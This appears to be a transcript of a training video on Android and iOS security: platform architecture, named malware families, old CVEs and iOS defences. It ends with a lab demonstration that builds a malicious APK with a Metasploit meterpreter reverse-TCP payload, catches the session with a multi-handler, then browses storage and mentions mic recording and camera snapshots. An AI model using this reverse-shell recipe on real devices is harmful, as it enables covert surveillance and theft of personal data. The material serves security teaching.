Let's start with Chapter 7, Android and iPhone Hacking. Before proceeding, let's discuss some points about Android. Android was purchased by Google in 2005. The first Android phone was sold in October 2008. Android is an operating system based on the Linux kernel. Android holds 75% of the worldwide smartphone market. Android is a next gen operating system to be developed for small mobile devices. Android is a widely anticipated open source operating system for mobile devices. It provides base operation system, application middleware layer, Java software development kit, and a collection of system applications. Taking a look into the basic Android features. Android does not support applications developed for other platforms. It restricts application interaction to its special APIs by running each application as its own user identity. It uses a simple permission label assignment model to restrict access to resources and other applications. In the following image, you can see the applications, application framework, libraries, and Linux kernel, which is a part of Android application development. What is meant by APK? APK is also known as Android Application Package File. It is the file format that is used for distributing and installing application software and middleware onto Google's Android operating system. Very similar to an MSI package in Windows or a deb package in Debian based operating systems such as Ubuntu. To make an APK file, program for Android is first compiled and then all of its parts are packaged into one file. APK files are zip file formatted packages based on the jar file format with .apk file extensions. Listed below is the Android malware which can harm your Android device and make you a victim. The first one is Android.AccuTrack. This application turns an Android smartphone into a GPS tracker. The second one is Android.AcPose. This Trojan steals contact information from the compromised device and uploads them to a remote server. The third one is Android AcNetDoor. This Trojan opens a backdoor on the infected device and sends the IP address to a remote server. The fourth one is Android.Antares or Antami. This is a Trojan which steals personal information from the infected device. The fifth one is Android.PasteBridge. This malware forwards confidential information about your Android smartphone, such as SMS, IMSI, IMEI details, to a remote server. Remote shellcode execution on WebKit is discovered by MJ Keith. For more details, you can check the common vulnerability exposures 2010 1807. It will allow remote access to execute arbitrary code or cause a denial of service via crafted HTML document. This vulnerability is present in Android 2.1 and its earlier versions. What is meant by WebKit? WebKit can be defined as a layout engine software designed to allow web browsers to render web pages. It is a default browser in Apple iOS, Android, and BlackBerry, etc. In the previous slide, we have seen the remote shellcode vulnerability. where this vulnerability provides the attacker access to the target machine across the network. In this attack, a pointer points to a memory that was deallocated. Reallocating the memory can lead to access control of the attacker. Android protects stack from being overwritten, and randomized stack layout prevents attacker relying on specific addresses so that this attack can be mitigated. This attack targets the heap memory. Now let's take a look onto the overview of the attack. It makes references to the element in two different ways. First of all, remove the element using our second reference, unlocking the memory. The first reference retains its pointer to the deallocated spot in memory. Now, we can reallocate the memory to the first reference. Using a for loop, we can create the same string over and over until we collect garbage and refill the memory with our new data. We can now request data from our original variable. Android data stealing vulnerability was discovered by Thomas Cannon. For more details, you can refer CVE 2010 4804 document list vulnerability details of this particular vulnerability. It will allow remote attackers to open and obtain SD contents via crafted URL. This vulnerability is present in Android 2.2 in Android 2.3.3 and its earlier version. For this attack overview, the Android browser does not prompt the user when downloading a file for payload.html. It will automatically download this file to SD card /download payload.html. It is possible to automatically open this payload using JavaScript, causing the browser to render the local file. When this HTML file is opened within this local context, the Android browser will run the JavaScript without prompting the user. While in this local context, the JavaScript is able to read the contents of the files. Now taking a look into the basics of Android operating system. What is Android manifest, permissions and binaries? The Android manifest.xml file contains information about your package, including components of the application such as activities, services, content providers, broadcast receivers, etc. It performs some other tasks also, such as it is responsible to protect the application to access any protected paths by providing the necessary permission. It also declares the Android API that the application is going to use. It lists the instrumentation classes. The instrumentation classes provide profiling and other information. This information is removed just before the application is published. Now let us take a look into the Android file system. There are two methods of file storage. The first one is internal storage. The second one is external storage. Internal storage refers to the on-device hard drive and does not include SD cards. Internal storage gives you the ability to prevent other applications from accessing the files you save and are tied directly to your app. For external storage, it is typically either a removable storage media, namely SD card, or an internal non-removable storage that is accessed in the same manner. In either case, anything written to this location can be accessed by other programs. Moved on to and from the computer or deleted without any notice to your application. One factor when considering using external storage versus internal storage is that older devices have limited onboard storage and using external storage may be necessary. Now let us take a look into database and storage uses in Android. SQLite is an open source relational database which is used for performing database operations on Android devices such as storing, manipulating, and retrieving persistent data from the database. It is embedded in Android by default, so there is no need to perform any database setup or administration task. SQLite Open Helper class provides the functionality to use the SQLite database. Let us now delve into memory analysis in Android. The Android SDK provides two main ways of profiling the memory usage of an application: the Allocation Tracker tab in DDMS and heap dumps. The Allocation Tracker is useful when you want to get a sense of what kinds of allocations are happening over a given time period, but it does not give you any information about the overall state of your application's heap. A heap dump is a snapshot of an application's heap which is stored in a binary format called hprof. Dalvik uses a format that is similar but not identical to the hprof tool in Java. To generate a heap dump of a running Android app, one way is to use the dump hprof file button in DDMS. Traffic interception in Android operating system can be done by using some special type of malware. For example, Android.adrd is unique in being the first Android operating system Trojan whose purpose is search engine manipulation. Propagation of ADRD and JNME is via pirated software, which allows the author to Trojanize the Android device and hence deliver malicious content on top of clean content. Both threads register themselves to run at boot time. Android.adrd also registers itself when a phone call is made or network connectivity settings are changed. Android.jnme is a malware which opens a backdoor on a device and has more than 20 functions such as making calls, sending text messages, and stealing sensitive information. Now let us take a look into how we can use proxies in Android operating systems. In here, we will use global proxy apps like ProxyDroid, AS Proxy, GAE Proxy to enable proxy support on your phone or tablet. This is the most reliable and powerful application to support or enable global proxy on Android, available on the Google Play stores or Android market. It supports HTTP, HTTPS, SOX4, SOX5 proxy. It also supports basic NTLM, NTLM version 2 authentication methods. Also, it has support for multiple profiles and it can bypass custom IP addresses also. Shown here are some mitigation techniques which can be used to avoid Android attacks. The first one is to disable JavaScript in your browser. If any malware comes into your machine, it will prompt you before downloading the payload. So, it is important to be alert at that time. You should watch out for the HTML file sent through emails. Moving on, we shall now delve into iPhone or iOS security. So, Apple designed the iOS platform with security at its core. Keeping information secure on mobile devices is critical for any user, whether they are accessing corporate and customer information or storing personal photos, banking information, and addresses. Because every user's information is important, iOS devices are built to maintain a high level of security without compromising the user experience. You can see in this diagram a brief security architecture of iPhone or iOS security. We have two categories: software and hardware or firmware. In the software, data protection class deals with the app sandbox. After that, user partition deals with operating system partition, which overall pass through the encrypted channel, and the output data sent will be encrypted and secure. Crypto Engine and Apple Root Certificate enhance the security of iPhone. Let us now go into a brief discussion of iOS security. In iOS security, we focus on system architecture, encryption, data protection, network security, and device access. In system architecture, the secure platform and hardware foundations of iPhone, iPad, and iPod Touch make it reliable and durable. For the encryption and data protection section, the architecture and design that protects the user's data when the device is lost or stolen, or when an unauthorized person attempts to use it or modify it. In network security, iOS has industry standard networking protocols that provide secure authentication and encryption of data in transmission. Device access means methods that prevent unauthorized use of the device and enable it to be remotely wiped if lost or stolen. There are 5 key features of iOS when it comes to security, namely data execution protection, address space layout randomization, code signing, sandboxing, and the App Store. Let us discuss these features one by one. Data execution prevention or DEP is an operating system security feature that marks memory location as non-executable, which is then enforced by the CPU itself. This reduces the opportunity for successful memory corruption attacks. In address space layout randomization or ASLR, it randomizes the memory locations of system components to make it extremely difficult for an attacker to complete exploitation and run their own code, even if they do find and take advantage of vulnerability. Randomizing the location of system components makes it difficult for attackers to know exactly where to hook their code in order to take over the system. The next feature would be code signing, in which all applications on iOS must be cryptographically signed. Better yet, they must be signed using an official Apple Digital Certificate or an official enterprise certificate installed on the device for custom enterprise applications. This prevents unsigned code from running on the device, including exploit code. Apple only signs applications sold through the App Store, minimizing the danger for malicious apps. The next feature would be sandboxing. Here, all applications are highly compartmentalized from each other with no central document or file store. Applications cannot influence each other's behavior or access shared data unless both applications explicitly allow and support such communication. The App Store. For consumers, only applications distributed by Apple through the App Store can be installed on an iOS. Enterprises can develop and distribute custom applications, but this uses a model similar to the App Store, and such applications only work on devices with the corresponding enterprise digital certificate installed. All App Store apps undergo code review by Apple. This is not perfect, but dramatically reduces the chance of malicious applications ending up on a device. Now let us take a look into data protection features in iOS phone. The first feature would be hardware encryption. The iPhone 3Gs and later all iPads support built-in hardware encryption. All user data can be automatically encrypted in hardware at all times. This is used primarily for wiping the device rather than to stop attacks. Rather than slowly erasing the entire flash storage, wiping works by immediately destroying the encryption key, which makes user data inaccessible. Data is encrypted with the device key the OS has full access to. This means even encrypted data is exposed if someone jailbreaks or otherwise accesses the device directly. Hardware encryption is also used to provide some protection against unauthorized physical access. Data protection. As noted above, hardware encryption is relatively easy to circumvent because it is primarily designed to wipe the device, not to secure data from attack. To address this need, Apple added a data protection option in iOS and made it available to applications with iOS 4. When a user sets a passcode to lock their email data, including attachments, it is encrypted using the passcode as the key. Data protection also applies to applications that leverages the data protection API. With this enabled, even if the device is physically lost or exploited, any data protected with this feature, specifically mail and data for third-party applications that implements the data protection API, is encrypted. Attackers may still attempt to brute force the key. Continuing on with the data protection, we shall now see backup encryption. All iOS devices automatically back themselves up to iTunes or iCloud when they connect to and synchronize with the computer. If backup encryption is enabled, all the data is encrypted on the device using the designated password before transferring to the computer. Note that if the user sets a weak password, this protection might not be worth much. Additionally, the password may be stored in the iTunes computer's system keychain. Also, the iOS keychain is stored in the backup encrypted. Let us now go through a history of iOS attacks. For iOS 1, we had a vulnerability called as libtiff. Libtiff is a library used to process TIFF images, which had a known vulnerability in it. Once exploited, the vulnerability resulted into root access on the iPhone device. Note that iOS has no ASLR, no DEP, and no code signing. For iOS 2, we had two vulnerabilities. One would be a vulnerability in the SMS parser. This vulnerability could result into root access remotely using SMS messages. The root access was possible because all the processes run with normal user mode except SMS applications. Another attack was a IKEE worm. The worm targeted jailed broken devices where code signing and other security features were disabled to remotely control the infected devices. In iOS 3, we had SpyPhone malware. SpyPhone was a proper code signed app that could be downloaded using App Store. SpyPhone malware, even running in sandbox mode, could extract a lot of sensitive information about the user, such as cell phone number, GPS information, email account information. It could also have read and write access to address book. It could also access keyboard cache and go through geotagged photos. For iOS 4, there was a Pontoon contest in 2010 which revealed a vulnerability in mobile Safari. This vulnerability need not require bypassing the ASLR as it was a special vulnerability. It used ROP with signed code as shellcode to execute. However, sandbox mode reduced the damage only to mobile user. For iOS 6.1, it has implemented several defense improvements. iOS 6.1 has further improved the security of iOS, focusing primarily on three areas: kernel address space layout randomization, wherein the kernel code and data memory address is randomized once during device boot. Another aspect is kernel address space hardening, and kernel executable code in memory is no longer writable. One more point where iOS improved its security was that the kernel heap was no longer executable, and the kernel address space is separated from the user space processes. So this would be all for the module on Android and iPhone hacking. Next up would be the demonstration to illustrate the concept. Thank you. In this demonstration, we shall be seeing the basics of how an Android phone can be compromised using a malicious application. So, we shall be using Kali Linux over here. Let us open two terminals. So, the basic idea is to create a malicious application, and using which we will try to compromise a Android platform based device. So first of all, let us open Metasploit console by typing in msf console, and in the other terminal let us create a payload or a malicious application. So the command is as such: msf payload android / meterpreter / reverse tcp, and then what we have to do is, you can see on the other hand that the Metasploit console has opened. And typing in lhost, and the lhost will define the system where it will receive the connection after running the application. So just see the IP address for your Kali Linux machine. And one thing to mention here is you have to put this in bridged mode if you want to apply this particular demonstration in your own computer. So keeping the lhost as 192.168.1.5 and the L port as 4444, and after that R, that which means we are exporting the payload in a raw format and giving the name of that APK file which we shall create as new1.apk. The majority of Android phones nowadays are compromised with the help of malicious applications. These applications run amok because of improper checks during uploading or marketing this in the Google App Store. So proper checks should be placed in order to prevent such attacks from taking place. So after entering the command and pressing enter, you have to wait for some time, and you can see now the command has been completed. So closing this window and going on to places and traversing to the file system, then going on to the root folder, you can see that the new1.apk has been created. So this will be a malicious application which we shall install in an Android device and try to compromise it. Now you can see here I've created several malicious applications, but for the sake of this demonstration I shall be using new1.apk. And here is the Metasploit console. So getting out of the virtual machine, what we can see here is this application new1.apk. The thing here to remember is you can either transport it via a USB thumb drive if you are transferring it from a virtual machine to the host machine, or you can install VMware tools in VMware Workstation and then copy it and paste it over there. So looking at the properties, so you can see here that it is an APK file which is opened by a BlueStacks emulator. BlueStacks is a platform which is used to run Android applications in Windows. So coming back to Kali Linux, what we have to do is we have to use a particular exploit known as multi-handler, and you have to type in exploit slash multi slash handler over here, and we get access to the exploit panel. So typing exploit, so this handler is used to receive connections from external sources. So you can see here when you run this exploit, it is creating a reverse handler which is waiting for connections in Kali Linux. So now coming back to our main machine, we have to double click this file. So double click on it, we can see that it is installing that APK in the BlueStacks emulator. There are a variety of Android emulators in the market. Apart from BlueStacks, you can go with the default Android SDK, which is provided free of cost by Google, which is the major platform on which Android applications are developed. So there you can use pretty much any emulator there is if you want to simulate this attack on a Windows computer. Apart from that, you can use a Android device also if you want to check this whether this is working on an Android device or not. So you can transport this APK to that Android device and install it over there. And double clicking on it, we have to wait for some time until this connection is installed. In most Android devices, third-party applications are not supported as well as applications from Google Apps. So it is important that you have to first root the device. That will be required in some cases. And rooting the device can be done using guides provided in the internet. So once installed, this application will look something like this. So now you can send that. You can see that Kali Linux is sending a payload over to that application, or in fact, which is a simulation of that Android device. So we shall be sending that payload and waiting for the connection to appear. This process will take some time, so it is important to be patient while this is working. Metasploit, it is important for us to know that this Android payload is now you can see here that a Meterpreter session has been opened. This particular attack is supported only by the latest version of Metasploit, that is Metasploit 4.8.2. So you have to update your Metasploit. So if you type in sysinfo, you can see that the OS is Linux 3.0.36 Android BST, and the Meterpreter is that Java Meterpreter. So if you type in help, you can see a list of the commands that can be executed by this shellcode. So typing in any command, so we traverse to the root directory of the Android device by typing cd slash and pressing ls. We can see that this is the directory, these are the file systems over there and the directories and the scripts in the Android device. So moving on to the external storage, cd sd card, typing ls again, we can see that we gain access to the folders which are present in the external storage device of the Android mobile. So in this way you can get access to a variety of files and images and ringtones and everything. There are several other commands such as record mic and taking a snapshot from the cameras, and apart from that you can view the list current processes which are running on the device, and get UID gives the current username of the user which is running that application. And here if you type in ps, you can see that all these are different processes which are running on the Android device along with different privileges like root system and the like. So this is all for the demonstration on Android mobile phone hacking. So thank you.